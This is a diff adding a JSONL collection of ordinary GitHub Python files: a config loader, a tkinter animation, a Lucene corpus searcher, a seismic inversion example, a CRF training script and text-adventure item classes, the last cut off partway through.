diff --git "a/2581.jsonl" "b/2581.jsonl" new file mode 100644--- /dev/null +++ "b/2581.jsonl" @@ -0,0 +1,650 @@ +{"seq_id":"70622692214","text":"import json\nimport os\nimport sys\n\nimport yaml\nfrom pydash import defaults_deep\n\n\nclass CipherConfig():\n \"\"\"Utilities used for managing application configuration.\"\"\"\n\n Environment = \"Development\"\n \"\"\"\n Specifies the environment of the server. Could be either \"Development\", \"Staging\", or \"Production\"\n\n **Config Key**: \"CipherEnvironment\"\n\n **Default Value**: \"Development\"\n \"\"\"\n\n Country = \"US\"\n \"\"\"\n Specifies the country of the server.\n\n **Config Key**: \"CipherCountry\"\n\n **Default Value**: \"US\"\n \"\"\"\n\n DefaultSearchLocation = None\n \"\"\"\n Specifies a location to include when searching for connection \"server.json\" configuration files, and environment \"environment.json\" files.\n\n **Config Key**: \"ConfigSearchPath\"\n\n **Default Value**: \"D:\\\\\\\\apps\" or \"P:\\\\\\\\\"\n \"\"\"\n\n @staticmethod\n def get_DefaultSearchLocation():\n return CipherConfig.DefaultSearchLocation if CipherConfig.DefaultSearchLocation is not None else [\"D:\\\\apps\", \"P:\\\\\"]\n\n @staticmethod\n def load(filepath: str, checkForEnvTransforms=True, ignoreConfigSearchPathKey=False) -> dict:\n \"\"\"\n Loads a YAML file and returns it as a dictionary.\n\n If the dictionary contains any of the config keys for the three properties of CipherConfig listed above,\n they will be set and used going forward.\n\n If the ``checkForEnvTransforms`` argument is True or unspecified,\n it will additionally load any current environment specific files if they exist.\n For example, if the current environment is configured as ``Development`` and filepath is ``parameters.yaml``,\n a file named ``parameters.development.yaml`` will be loaded and merged with ``parameters.yaml``.\n Values in the environment transform file will override values in the main file.\n \"\"\"\n config = None\n with open(filepath, \"r\") as ymlfile:\n config = yaml.load(ymlfile)\n\n if checkForEnvTransforms:\n (root, ext) = os.path.splitext(filepath)\n path = root + \".\" + CipherConfig.Environment.lower() + ext\n if os.path.isfile(path):\n with open(path, \"r\") as ymlfile:\n env_config = yaml.load(ymlfile)\n config = defaults_deep({}, env_config, config)\n\n if not ignoreConfigSearchPathKey:\n if \"ConfigSearchPath\" in config:\n CipherConfig.DefaultSearchLocation = config[\"ConfigSearchPath\"]\n CipherConfig.loadEnvironment()\n if \"CipherEnvironment\" in config:\n CipherConfig.Environment = config[\"CipherEnvironment\"]\n if \"CipherCountry\" in config:\n CipherConfig.Country = config[\"CipherCountry\"]\n\n return config\n\n @staticmethod\n def loadConnections(configpath=\"servers.json\", search_location=None) -> list:\n \"\"\"\n Typically only used internally by CipherData to locate and load a servers.json file and return a list of connection configurations.\n \"\"\"\n if search_location is None:\n search_location = CipherConfig.get_DefaultSearchLocation()\n\n __location__ = CipherConfig.__searchPath(configpath, search_location)\n\n if __location__ is None:\n raise FileNotFoundError(\"Could not find servers.json in \" + str(search_location))\n\n with open(__location__, 'r') as f:\n return json.load(f)\n\n @staticmethod\n def loadEnvironment(configpath=\"environment.json\", search_location=None, ignoreEnvVars=False):\n \"\"\"\n Typically only used internally by CipherConfig to locate and load an environment.json file and set the Environment and Country properties on application start.\n\n This method is called on the first import of the module and uses the DefaultSearchLocation property default value first.\n If the config key “ConfigSearchPath” is present in a file loaded by the CipherConfig.load method,\n this method will be called again to try to locate and load environment.json again.\n \"\"\"\n\n os_env = os.getenv(\"Cipher_Environment\", None) if not ignoreEnvVars else None\n os_country = os.getenv(\"Cipher_Country\", None) if not ignoreEnvVars else None\n\n if os_env is None or os_country is None:\n __location__ = CipherConfig.__searchPath(configpath, search_location)\n\n if __location__ is None:\n return\n\n with open(__location__, 'r') as f:\n config = json.load(f)\n if \"Environment\" in config:\n CipherConfig.Environment = config[\"Environment\"]\n if \"Country\" in config:\n CipherConfig.Country = config[\"Country\"]\n\n CipherConfig.Environment = os_env if os_env is not None else CipherConfig.Environment\n CipherConfig.Country = os_country if os_country is not None else CipherConfig.Country\n\n @staticmethod\n def __searchPath(path, search_location):\n if os.path.isfile(path):\n __location__ = path\n else:\n if search_location is None:\n search_location = CipherConfig.get_DefaultSearchLocation()\n __location__ = None\n search_locations = list(sys.path)\n if type(search_location) is list:\n search_locations = search_location + search_locations\n else:\n search_locations.insert(1, search_location)\n for dirname in search_locations:\n candidate = os.path.join(dirname, path)\n if os.path.isfile(candidate):\n __location__ = candidate\n break\n\n return __location__\n\n\nCipherConfig.loadEnvironment()\n","repo_name":"vamseeachanta/aceengineercode","sub_path":"ExistingCodes/Reference/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71183560372","text":"from dataclasses import dataclass\nfrom tkinter import *\nimport time\n\nDURATION=0.01\n\n@dataclass\nclass Ball:\n id:int\n x:int\n y:int\n d:int\n vx:int\n vy:int\n c:str\n\n@dataclass\nclass Border:\n left:int\n right:int\n top:int\n bottom:int\n\ndef make_ball(x,y,d=10,vx=2,vy=2,c=\"black\"):\n id=canvas.create_rectangle(x,y,x+d,y+d,\n fill=c,outline=c)\n return Ball(id,x,y,d,vx,vy,c)\n\ndef move_ball(ball):\n ball.x=ball.x+ball.vx\n ball.y=ball.y+ball.vy\n\ndef redraw_ball(ball):\n canvas.coords(ball.id,ball.x,ball.y,\n ball.x+ball.d,ball.y+ball.d)\n\ndef make_walls(ox,oy,width,height):\n canvas.create_rectangle(ox,oy,ox+width,oy+height)\n\ntk=Tk()\ncanvas=Canvas(tk,width=800,height=600)\ncanvas.pack()\ntk.update()\n\nborder=Border(100,700,100,500)\nmake_walls(border.left,border.top,\n border.right-border.left,\n border.bottom-border.top)\n\nballs=[make_ball(110,110),\n make_ball(200,300),\n make_ball(500,100),\n make_ball(400,300),]\n\n\nwhile 1:\n for ball in balls:\n if ball.x+ball.vx < border.left \\\n or ball.x+ball.d+ball.vx > border.right:\n ball.vx *= -1\n \n if ball.y+ball.vy < border.top \\\n or ball.y+ball.d+ball.vy > border.bottom:\n ball.vy *= -1\n \n move_ball(ball)\n redraw_ball(ball)\n tk.update()\n time.sleep(DURATION)","repo_name":"kikugawa-shoma/python_game","sub_path":"Block_Breaking/ex02-2-bounce.py","file_name":"ex02-2-bounce.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12253991421","text":"import sys, os, lucene, time, re, json\nfrom java.nio.file import Paths\nfrom org.apache.lucene.store import SimpleFSDirectory\nfrom org.apache.lucene.search import IndexSearcher, BooleanQuery, BooleanClause, TermQuery, RegexpQuery\nfrom org.apache.lucene.search.spans import SpanQuery, SpanNearQuery, SpanTermQuery, SpanOrQuery, SpanMultiTermQueryWrapper, SpanNotQuery\nfrom org.apache.lucene.index import DirectoryReader, Term\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(os.path.dirname(os.path.abspath(__file__ + '../../')))\nfrom NewPatternCommandParser import CommandParser\nfrom Content import new_get_content, get_text_from_content\n\n\nword_reg = \"[\\u4E00-\\u9FA5\\uF900-\\uFA2D]\"\nindex_dir = \"../../index/index_ancient\"\nindex_dir_server = \"./function/index/index_ancient\"\n\n\nclass Searcher(object):\n def __init__(self, userQuery: str, directory: str, zh_to_hant_dict=None):\n d = SimpleFSDirectory(Paths.get(directory))\n if zh_to_hant_dict:\n self._zh_to_hant_dict = zh_to_hant_dict\n else:\n self._zh_to_hant_dict = {}\n self._dir = directory\n self._search = IndexSearcher(DirectoryReader.open(d))\n self._userQuery = CommandParser(userQuery)\n self._cur_field = None\n self._res = None\n self._reg = None\n\n def search(self, field):\n s = self._search\n u = self._userQuery\n zh_to_hant_dict = self._zh_to_hant_dict\n info = u.getFlagsInfo()\n flags_list = u.getFlagsList()\n sq_list = []\n word_index_list = []\n index_count = 0\n for flag in flags_list:\n if flag[\"type\"] == \"word\":\n word_index_list.append(index_count)\n if len(flag[\"content\"]) == 1:\n if flag[\"content\"][0] in zh_to_hant_dict:\n stq_list = [SpanTermQuery(Term(field, flag[\"content\"][0]))]\n for hant in zh_to_hant_dict[flag[\"content\"][0]]:\n stq_list.append(SpanTermQuery(Term(field, hant)))\n sq_list.append(SpanOrQuery(stq_list))\n else:\n sq_list.append(SpanTermQuery(Term(field, flag[\"content\"][0])))\n else:\n snq_list = []\n for w in flag[\"content\"]:\n if w in zh_to_hant_dict:\n stq_list = [SpanTermQuery(Term(field, w))]\n for hant in zh_to_hant_dict[w]:\n stq_list.append(SpanTermQuery(Term(field, hant)))\n snq_list.append(SpanOrQuery(stq_list))\n else:\n snq_list.append(SpanTermQuery(Term(field, w)))\n sq_list.append(SpanNearQuery(snq_list, 0, True))\n else:\n sq_list.append({\"op\": info[flag[\"content\"]][\"op\"], \"num\": info[flag[\"content\"]][\"num\"]})\n index_count += 1\n q = None\n count = 0\n for index in word_index_list:\n if count == 0:\n q = sq_list[index]\n count += 1\n else:\n if not isinstance(sq_list[index-1], dict):\n q = SpanNearQuery([q, sq_list[index]], 0, True)\n else:\n q = SpanNearQuery([q, sq_list[index]], sq_list[index-1][\"num\"][-1], True)\n query = q\n # 过滤项\n filters = u.getFields()\n bq = BooleanQuery.Builder()\n bq.add(BooleanClause(query, BooleanClause.Occur.MUST))\n for key in filters.keys():\n cur_reg = '('\n for ft in filters[key]:\n cur_reg += ft + '|'\n cur_reg = cur_reg[0: -1] + ')'\n rq = RegexpQuery(Term(key, cur_reg))\n bq.add(BooleanClause(rq, BooleanClause.Occur.MUST))\n query = bq.build()\n top_docs = s.search(query, 9999)\n self._cur_field = field\n\n reg = get_test_reg(flags_list, info, zh_to_hant_dict)\n doc_id_list = []\n hits = top_docs.scoreDocs\n for hit in hits:\n doc = s.doc(hit.doc)\n text = doc.get(\"text\")\n match_res = re.search(reg, text)\n if match_res:\n doc_id_list.append(hit.doc)\n self._res = doc_id_list\n self._reg = reg\n return self\n\n def get_by_page(self, page_num=0, page_size=30, length_tup=(30, 30)):\n doc_id_list = self._res\n s = self._search\n d = self._dir\n reg = self._reg\n doc_list = []\n total_hits = len(doc_id_list)\n # 分页\n start_index = page_num * page_size\n if start_index + page_size <= len(doc_id_list):\n end_index = start_index + page_size\n else:\n end_index = len(doc_id_list)\n for i in range(start_index, end_index):\n doc = s.doc(doc_id_list[i])\n cur_id = doc.get(\"id\")\n r = doc.get(\"text\")\n document = doc.get(\"document\")\n section = doc.get(\"section\")\n match_span = re.search(reg, r).span()\n context = get_text_from_content(new_get_content(d, cur_id))\n prev_len = len(context[\"prev\"][-1])\n str_context = context[\"prev\"][-1] + context[\"cur\"][0] + context[\"next\"][0]\n match_span = (prev_len + match_span[0], prev_len + match_span[1])\n mid = str_context[match_span[0]: match_span[1]]\n if match_span[0] < length_tup[0]:\n left = str_context[0: match_span[0]]\n else:\n left = str_context[match_span[0] - length_tup[0]: match_span[0]]\n if len(str_context) - match_span[1] < length_tup[1]:\n right = str_context[match_span[1]:]\n else:\n right = str_context[match_span[1]: match_span[1] + length_tup[1]]\n doc_list.append({\"left\": left, \"mid\": mid, \"right\": right, \"id\": cur_id, \"document\": document, \"section\": section})\n return {\"total\": total_hits, \"doc_list\": doc_list, \"regexps\": [reg]}\n\n def get_result_statistics_by_keyword(self):\n doc_ids = self._res\n # print(doc_ids)\n s = self._search\n reg = self._reg\n res_dict = {}\n for doc_id in doc_ids:\n doc = s.doc(doc_id)\n text = doc.get(\"text\")\n key_word = re.search(reg, text).group()\n if key_word:\n if key_word in res_dict.keys():\n res_dict[key_word] += 1\n else:\n res_dict[key_word] = 1\n return res_dict\n\n def get_result_statistics_by_field(self, field):\n doc_ids = self._res\n s = self._search\n res_dict = {}\n for doc_id in doc_ids:\n doc = s.doc(doc_id)\n field_val = doc.get(field)\n if field_val:\n if field_val in res_dict.keys():\n res_dict[field_val] += 1\n else:\n res_dict[field_val] = 1\n return res_dict\n\n\ndef get_test_reg(flags_list, flags_info, zh_to_hant_dict):\n reg = \"\"\n mem = []\n for flag in flags_list:\n if flag[\"type\"] == \"word\":\n word_hant_reg = \"\"\n w_hant_reg = \"\"\n for w in flag[\"content\"]:\n w_hant_reg += \"[\" + w\n if w in zh_to_hant_dict:\n for hant in zh_to_hant_dict[w]:\n w_hant_reg += hant\n w_hant_reg += \"]\"\n word_hant_reg += w_hant_reg\n reg += word_hant_reg\n else:\n f_info = flags_info[flag[\"content\"]]\n op = f_info[\"op\"]\n num = f_info[\"num\"]\n if flag[\"content\"] not in mem:\n mem.append(flag[\"content\"])\n if op == \"<\":\n reg += \"(\" + word_reg + \"{1,\" + str(num[0]) + \"})\"\n elif op == \"-\":\n reg += \"(\" + word_reg + \"{\" + str(num[0]) + \",\" + str(num[1]) + \"})\"\n else:\n reg += \"(\" + word_reg + \"{\" + str(num[0]) + \"})\"\n else:\n reg += \"\\\\\" + str(mem.index(flag[\"content\"]) + 1)\n return reg\n\n\ndef initVM():\n vm_env = lucene.getVMEnv()\n if vm_env:\n vm_env.attachCurrentThread()\n else:\n lucene.initVM(vmargs=['-Djava.awt.headless=true'])\n\n\nif __name__ == '__main__':\n # uc = \"(V=1)先儒(K<5)釋不\"\n initVM()\n # uc = \"基立而後可大成也\"\n uc = \"好\"\n st = time.time()\n ucp = CommandParser(uc)\n print(Searcher(ucp, index_dir).search('text').get_result_statistics_by_field(\"dynasty\"))\n et = time.time()\n print('const:' + str(et - st))\n","repo_name":"xyorz/corpus","sub_path":"function/operation/pattern_search/NewPatternSearcher.py","file_name":"NewPatternSearcher.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9852488632","text":"import torch\nimport torchvision\nfrom scipy.ndimage import gaussian_filter\nimport matplotlib.pyplot as plt\nimport deepwave\nfrom deepwave import scalar_born\n\ndevice = torch.device('cuda' if torch.cuda.is_available()\n else 'cpu')\nny = 2301\nnx = 751\ndx = 4.0\nv_true = torch.from_file('marmousi_vp.bin',\n size=ny*nx).reshape(ny, nx)\n\n# Select portion of model for inversion\nny = 600\nnx = 250\nv_true = v_true[:ny, :nx]\n\n# Smooth to use as starting model\nv_init = (torch.tensor(1/gaussian_filter(1/v_true.numpy(), 40))\n .to(device))\nv = v_init.clone()\nv.requires_grad_()\n\nn_shots = 115\n\nn_sources_per_shot = 1\nd_source = 20 # 20 * 4m = 80m\nfirst_source = 10 # 10 * 4m = 40m\nsource_depth = 2 # 2 * 4m = 8m\n\nn_receivers_per_shot = 384\nd_receiver = 6 # 6 * 4m = 24m\nfirst_receiver = 0 # 0 * 4m = 0m\nreceiver_depth = 2 # 2 * 4m = 8m\n\nfreq = 25\nnt = 750\ndt = 0.004\npeak_time = 1.5 / freq\n\nobserved_data = (\n torch.from_file('marmousi_data.bin',\n size=n_shots*n_receivers_per_shot*nt)\n .reshape(n_shots, n_receivers_per_shot, nt)\n)\n\n# Select portion of data for inversion\nn_shots = 20\nn_receivers_per_shot = 100\nnt = 300\nobserved_data = (\n observed_data[:n_shots, :n_receivers_per_shot, :nt].to(device)\n)\n\n# source_locations\nsource_locations = torch.zeros(n_shots, n_sources_per_shot, 2,\n dtype=torch.long, device=device)\nsource_locations[..., 1] = source_depth\nsource_locations[:, 0, 0] = (torch.arange(n_shots) * d_source +\n first_source)\n\n# receiver_locations\nreceiver_locations = torch.zeros(n_shots, n_receivers_per_shot, 2,\n dtype=torch.long, device=device)\nreceiver_locations[..., 1] = receiver_depth\nreceiver_locations[:, :, 0] = (\n (torch.arange(n_receivers_per_shot) * d_receiver +\n first_receiver)\n .repeat(n_shots, 1)\n)\n\n# source_amplitudes\nsource_amplitudes = (\n (deepwave.wavelets.ricker(freq, nt, dt, peak_time))\n .repeat(n_shots, n_sources_per_shot, 1).to(device)\n)\n\n# Setup optimiser to perform inversion\nscatter = torch.zeros(ny, nx, device=device)\nscatter.requires_grad_()\noptimiser = torch.optim.LBFGS([v, scatter], lr=1)\nloss_fn = torch.nn.MSELoss()\n\n# Run optimisation/inversion\nn_epochs = 14\n\n\ndef closure():\n optimiser.zero_grad()\n # Remove high wavenumbers from the velocity model\n v_smooth = (\n torchvision.transforms.functional.gaussian_blur(\n v[None], [11, 11]\n ).squeeze()\n )\n # Remove low wavenumbers from the scattering model\n scatter_sharp = scatter - (\n torchvision.transforms.functional.gaussian_blur(\n scatter[None], [11, 11]\n ).squeeze()\n )\n out = scalar_born(\n v_smooth, scatter_sharp, dx, dt,\n source_amplitudes=source_amplitudes,\n source_locations=source_locations,\n receiver_locations=receiver_locations,\n bg_receiver_locations=receiver_locations,\n pml_freq=freq,\n )\n loss = 1e10 * loss_fn(out[-1]+out[-2], observed_data)\n loss.backward()\n print(loss.detach().item())\n return loss.item()\n\n\nfor epoch in range(n_epochs):\n print(epoch)\n optimiser.step(closure)\n\nv_smooth = (\n torchvision.transforms.functional.gaussian_blur(\n v.detach().cpu()[None], [11, 11]\n ).squeeze()\n )\nscatter_sharp = scatter.detach().cpu() - (\n torchvision.transforms.functional.gaussian_blur(\n scatter.detach().cpu()[None], [11, 11]\n ).squeeze()\n )\n\n# Plot\nvmin = v_true.min()\nvmax = v_true.max()\nsmin, smax = torch.quantile(scatter_sharp, torch.tensor([0.02, 0.98]))\n_, ax = plt.subplots(4, figsize=(10.5, 12.5), sharex=True,\n sharey=True)\nax[0].imshow(v_init.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\nax[0].set_title(\"Initial\")\nax[1].imshow(v_smooth.T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\nax[1].set_title(\"Out velocity\")\nax[2].imshow(scatter_sharp.T, aspect='auto', cmap='gray',\n vmin=smin, vmax=smax)\nax[2].set_title(\"Out scatter\")\nax[3].imshow(v_true.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\nax[3].set_title(\"True\")\nplt.tight_layout()\nplt.savefig('example_joint_migration_inversion.jpg')\n","repo_name":"ar4/deepwave","sub_path":"docs/example_joint_migration_inversion.py","file_name":"example_joint_migration_inversion.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"21"} +{"seq_id":"27492392197","text":"import argparse\nimport json\nimport logging\nimport shutil\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport joblib\nfrom tabulate import tabulate\n\nfrom experiments import corpus, training\nfrom experiments.evaluation import alpino, event_level, iob_level\n\nlogger = logging.getLogger(__name__)\n\n\nconfig = {\n \"n_folds\": 10,\n \"max_iter\": 500,\n \"main_events_only\": False,\n}\n\n\ndef train(args):\n\n timestamp = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n if args.test:\n out_dir = Path(\"output\") / f\"output-{timestamp}-test\"\n else:\n out_dir = Path(\"output\") / f\"output-{timestamp}\"\n out_dir.mkdir(parents=True)\n\n logging.basicConfig(filename=out_dir / \"train.log\", level=logging.DEBUG)\n\n if args.test:\n args.n_folds = 2\n args.max_iter = 10\n logger.warning(f\"Using test config: {args}\")\n else:\n logger.info(f\"Starting training with config: {args}\")\n\n # Prepare the X and y examples.\n examples = corpus.get_examples(main_events_only=args.main_events_only)\n logger.info(f\"Training with {len(examples)} training examples.\")\n\n # Initialize training folds.\n folds = list(training.make_folds(examples, args.n_folds))\n\n # Perform cross-validation training.\n training.train_crossval(folds, max_iter=args.max_iter)\n\n def save_examples(examples, dir):\n for ex in examples:\n ex_dir = dir / ex.id\n ex_dir.mkdir(parents=True)\n with open(ex_dir / \"x.json\", \"w\") as f:\n json.dump(ex.x, f)\n with open(ex_dir / \"y.json\", \"w\") as f:\n json.dump(ex.y, f)\n shutil.copy(ex.alpino_tree.file, ex_dir / \"alpino.xml\")\n\n # Dump the fold info.\n for fold in folds:\n\n fold_dir = out_dir / \"folds\" / f\"fold_{fold.id}\"\n fold_dir.mkdir(parents=True)\n joblib.dump(fold.crf, fold_dir / \"crf.pkl\")\n\n # Save each example in the fold.\n save_examples(fold.dev, fold_dir / \"data\" / \"dev\")\n\n logger.info(f\"Finished training -> {out_dir}\")\n\n\ndef eval(args):\n\n eval_dir = args.dir / \"eval\"\n\n if eval_dir.exists():\n raise ValueError(\n \"Eval dir already exists, hinting that evaluation has already been run on this dir. Remove the existing eval dir first.\"\n )\n else:\n eval_dir.mkdir(parents=True)\n\n logging.basicConfig(filename=eval_dir / \"eval.log\", level=logging.DEBUG)\n\n def load_examples(dir):\n examples = []\n for ex_dir in dir.iterdir():\n with open(ex_dir / \"x.json\", \"r\") as f:\n x = json.load(f)\n with open(ex_dir / \"y.json\", \"r\") as f:\n y = json.load(f)\n alpino_tree = alpino.AlpinoTree(\n ex_dir / \"alpino.xml\", restricted_mode=True\n )\n example = corpus.Example(\n id=ex_dir.stem, x=x, y=y, alpino_tree=alpino_tree\n )\n examples.append(example)\n return examples\n\n # Load fold data.\n fold_dirs = ((args.dir) / \"folds\").iterdir()\n\n folds = []\n for fold_dir in fold_dirs:\n id = fold_dir.stem.split(\"_\")[-1]\n crf = joblib.load(fold_dir / \"crf.pkl\")\n dev = load_examples(fold_dir / \"data\" / \"dev\")\n\n # For evaluation, no need to search for training data.\n fold = training.Fold(id=id, train=[], dev=dev)\n fold.crf = crf\n folds.append(fold)\n\n # Setup directories.\n micro_iob_scores_dir = eval_dir / \"scores_iob_micro\"\n micro_event_scores_dir = eval_dir / \"scores_event_spans_micro\"\n\n # Write out scores per fold and averaged.\n for fold in folds:\n\n # Each example in the fold's dev set contains a reference to the features x and the labeling y.\n # `example.x` is a list of feature dicts, 1 per token.\n # `example.y` is a list of BIO labels, 1 per token.\n\n golds = [ex.y for ex in fold.dev]\n xs = [ex.x for ex in fold.dev]\n trees = [ex.alpino_tree for ex in fold.dev]\n\n # Make prediction on the features dicts (xs) of the dev set examples in this fold.\n # The output has the same shape as Example.y: a list of BIO sequences, one per example.\n predictions = fold.crf.predict(xs)\n\n # Write out the predictions.\n m = []\n for x, gold, pred in zip(xs, golds, predictions):\n # Prepare a table with tokens, gold tags and pred tags.\n data = []\n for token_dict, gold_tag, pred_tag in zip(x, gold, pred):\n data.append(\n {\n \"token\": token_dict[\"token\"],\n \"gold\": gold_tag,\n \"pred\": pred_tag,\n }\n )\n m.append(tabulate(data, headers=\"keys\"))\n m = \"\\n\\n\".join(m)\n fp = eval_dir / \"predictions\" / f\"fold_{fold.id}.txt\"\n fp.parent.mkdir(parents=True, exist_ok=True)\n with open(fp, \"w\") as f:\n f.write(m)\n\n # Compute IOB scores.\n fold.micro_iob_scores = iob_level.score_micro_average(\n golds, predictions\n )\n\n # Compute event scores.\n fold.micro_event_scores = event_level.score_micro_average(\n golds, predictions, trees\n )\n\n write(\n fold.micro_iob_scores,\n micro_iob_scores_dir / f\"scores_{fold.id}.json\",\n )\n write(\n fold.micro_event_scores,\n micro_event_scores_dir / f\"scores_{fold.id}.json\",\n )\n\n write(\n training.average_scores([fold.micro_iob_scores for fold in folds]),\n micro_iob_scores_dir / \"averaged.json\",\n )\n\n write(\n training.average_scores([fold.micro_event_scores for fold in folds]),\n micro_event_scores_dir / \"averaged.json\",\n )\n\n logger.info(f\"Finished evaluation -> {eval_dir}\")\n\n\ndef write(json_dict, file_path):\n file_path.parent.mkdir(parents=True, exist_ok=True)\n with open(file_path, \"w\") as f:\n json.dump(json_dict, f, sort_keys=True, indent=4)\n\n\nparser = argparse.ArgumentParser()\nsubparsers = parser.add_subparsers()\n\nparser_train = subparsers.add_parser(\"train\")\nparser_train.add_argument(\n \"--n-folds\",\n help=\"Number of folds to use in crossval training.\",\n type=int,\n default=10,\n)\nparser_train.add_argument(\n \"--max-iter\",\n help=\"Number of iterations to run training in each fold.\",\n type=int,\n default=500,\n)\nparser_train.add_argument(\n \"--main-events-only\",\n help=\"If True, only use main events for training and evaluation.\",\n action=argparse.BooleanOptionalAction,\n default=False,\n)\nparser_train.add_argument(\n \"--test\",\n help=\"Use a test configuration that trains quickly.\",\n action=argparse.BooleanOptionalAction,\n default=False,\n)\nparser_train.set_defaults(func=train)\n\nparser_eval = subparsers.add_parser(\"eval\")\nparser_eval.add_argument(\n \"dir\",\n help=\"Directory containing folds saved after training.\",\n type=Path,\n)\nparser_eval.set_defaults(func=eval)\n\nargs = parser.parse_args()\n\n\nargs.func(args)\n","repo_name":"Zatteliet/eventdna-exp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23959730865","text":"'''\nCreated on Aug 22, 2014\n\n@author: Thomas\n'''\nfrom random import randint\nimport pyglet\nimport copy\nimport Enemies\n\nclass Item(object):\n #required params. instance cannot be created without these\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n self.name = name\n self.description = description\n self.seenDescription = seenDescription\n self.keywords = keywords\n self.currentLocation = None\n\n #set default values for case when no values are given\n self.initPickupDesc = None\n self.quantity = 1\n self.stackable = False\n self.accessible = True\n self.firstSeen = True\n self.firstTaken = True\n self.initPickupDesc = None\n self.initSeenDesc = None\n self.notTakenDesc = None\n self.drunkDesc = None\n self.drunkSearchDesc = None\n self.drunkDescThreshold = 50\n self.pickupSound = [\"Sounds/Misc/ItemGet.mp3\"]\n self.inAccessibleDesc = \"You can't reach it.\"\n self.pickupDesc = \"You pick up the \" + self.name + \".\"\n self.searchDesc = None\n \n #populate optional stats\n if kwargs is not None:\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def get(self, holder, player):\n #print \"Getting \" + self.name + \" - \" + str(self.quantity)\n if not self.accessible:\n return self.inaccessibleDesc,True\n\n for key, enemy in player.currentLocation.enemies.iteritems():\n if self in enemy.protectedThings:\n return enemy.protectedThings[self]\n elif self.currentLocation in enemy.protectedThings:\n return enemy.protectedThings[self.currentLocation]\n\n sources = list()\n \n #If there is more than 1, dup it and pass the dup. Quantity will be decremented later\n if (self.quantity > 1) and (not self.stackable):\n itemToGet = copy.deepcopy(self)\n itemToGet.quantity = 1\n itemToGet.firsSeen = False\n itemToGet.firstTaken = False\n else:\n itemToGet = self\n \n if self.quantity > 1 or (not self.firstTaken) or (not self.initPickupDesc):\n resultString = self.pickupDesc\n if self.stackable and (self.quantity > 1):\n resultString += \"(\" + str(self.quantity) + \")\"\n else :\n resultString = self.initPickupDesc\n self.firstSeen = False\n self.firstTaken = False\n\n sources.append(pyglet.media.load(self.pickupSound[randint(0, len(self.pickupSound) - 1)], streaming=False))\n #source.play()\n\n player.addItem(itemToGet)\n holder.removeItem(self)\n\n if (player.mainHand == None) and (isinstance(itemToGet, Weapon)):\n itemToGet.equip(player)\n return resultString, True, sources\n \n def drop(self, player):\n if (self.quantity > 1) and (not self.stackable):\n itemToDrop = copy.deepcopy(self)\n itemToDrop.quantity = 1\n else:\n itemToDrop = self\n\n player.removeItem(self)\n player.currentLocation.addItem(itemToDrop)\n resultString = \"You drop the \" + self.name\n if self.quantity > 1 and self.stackable:\n resultString += \"(\" + str(self.quantity) + \")\"\n return resultString,True\n \n def destroy(self, holder):\n holder.removeItem(self)\n \n def makeAccessible(self):\n self.accessible = True\n \n def makeInAccessible(self, desc):\n self.accessible = False\n self.inaccessibleDesc = desc\n \n def setPickupDesc(self, desc):\n self.pickupDesc = desc\n \n def setInitPickupDesc(self,desc):\n self.initPickupDesc = desc\n \n def setIdNum(self, number):\n self.idNum = number\n \n def lookAt(self, player):\n if self.drunkDesc and (player.intoxication >= self.drunkDescThreshold):\n return self.drunkDesc\n else:\n return self.description\n\n def search(self, player):\n resultString = \"\"\n if self.drunkSearchDesc and (player.intoxication >= self.drunkDescThreshold):\n resultString += self.drunkSearchDesc\n elif self.searchDesc:\n resultString += self.searchDesc\n elif self.drunkDesc and (player.intoxication >= self.drunkDescThreshold):\n resultString += self.drunkDesc\n resultString += \"\\n\\nThere isn't anything else of particular note about it.\"\n else:\n resultString += self.description\n resultString += \"\\n\\nThere isn't anything else of particular note about it.\"\n \n return resultString, True\n\n def exorciseAttempt(self, player):\n return \"After several minutes of yelling biblical phrases and waving your hands around wildly, you determine that the object is not, in fact, possessed.\"\n\n def playerRetreats(self):\n #if player is holding\n return \"No matter how you duck and weave to escape, it manages to stay right behind you the entire time. Possibly this has something to do with the fact that it is still in your pack.\"\n\nclass Armor(Item):\n \n def __init__(self, name, description, seenDescription, keywords, armorRating, **kwargs):\n self.armorRating = armorRating\n super(Armor, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def equip(self, player):\n if not(self.keywords in player.inventory):\n return \"I need to pick it up first.\"\n\n if player.armor == self:\n return \"You are already wearing that.\"\n \n player.armor = self\n return \"You put on the \" + self.name + \".\",True\n\n def wear(self, player):\n return self.equip(player)\n \nclass OffHandItem(Item):\n def __init__(self, name, description, seenDescription, keywords, **kwargs):\n self.size = 1\n super(OffHandItem, self).__init__(name, description, seenDescription, keywords, **kwargs)\n\n def equip(self, player):\n if not(self.keywords in player.inventory):\n return \"I need to pick it up first.\"\n\n if player.offHand == self:\n return \"That is already equipped.\"\n if self.size == 1:\n if player.mainHand == player.offHand:\n player.mainHand = None\n player.offHand = self\n return \"You equip the \" + self.name,True\n\nclass Weapon(Item):\n \n def __init__(self, name, description, seenDescription, keywords, minDamage, maxDamage, accuracy, size, **kwargs):\n #required\n self.minDamage = minDamage\n self.maxDamage = maxDamage\n self.accuracy = accuracy\n self.size = size\n\n #defaults\n self.attackDesc = \"You attack.\"\n\n super(Weapon, self).__init__(name, description, seenDescription, keywords, **kwargs)\n \n def equip(self, player):\n if not(self.keywords in player.inventory):\n return \"I need to pick it up first.\"\n\n if player.mainHand == self:\n return \"That is already equipped.\"\n if self.size == 1:\n if player.mainHand == player.offHand:\n player.offHand = None\n player.mainHand = self\n return 